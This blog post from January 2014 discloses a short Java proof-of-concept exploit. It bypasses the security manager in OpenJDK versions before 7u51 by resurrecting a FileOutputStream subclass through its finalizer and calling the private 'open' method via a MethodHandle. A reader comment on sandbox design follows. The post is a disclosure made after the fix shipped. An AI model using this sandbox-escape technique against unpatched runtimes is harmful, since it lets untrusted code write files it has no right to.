# Thursday, 16 January 2014
« Java Method Overriding Is FUBAR Part 8 o... | Main | New Development Snapshot »
Publicly Reported OpenJDK Vulnerability Fixed in 7u51

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists.

Now that it has been fixed in 7u51, here is a simple PoC exploit:

import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
  static test t;

  test() throws Exception {
    super("");
  }

  protected void finalize() {
    t = this;
  }

  public static void main(String[] args) throws Throwable {
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    try { new test(); } catch (Exception _) { }
    System.gc();
    System.runFinalization();
    mh.invokeExact(t, "oops.txt", false);
  }
}

Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.

Thursday, 16 January 2014 08:50:59 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]
Thursday, 16 January 2014 20:11:55 (W. Europe Standard Time, UTC+01:00)
Given the many different types of vulnerabilities I have seen on the JVM and the CLR I doubt that any in-process security boundary can be made to work. There's just too much surface area.

The BCL designers mistakenly tried to make many classes inheritable that just shouldn't be inherited from. Why should I ever inherit from FileStream? I can just inherit from Stream and wrap. Why inherit from Regex? Why inherit List<T>? Always a wrong design. Seal everything by default. Not just for security.
tobi
Name
E-mail
Home page

I apologize for the lameness of this, but the comment spam was driving me nuts. In order to be able to post a comment, you need to answer a simple question. Hopefully this question is easy enough not to annoy serious commenters, but hard enough to keep the spammers away.

Anti-Spam Question: What method on java.lang.System returns an object's original hashcode (i.e. the one that would be returned by java.lang.Object.hashCode() if it wasn't overridden)? (case is significant)

Answer:  
Comment (HTML not allowed)  

Live Comment Preview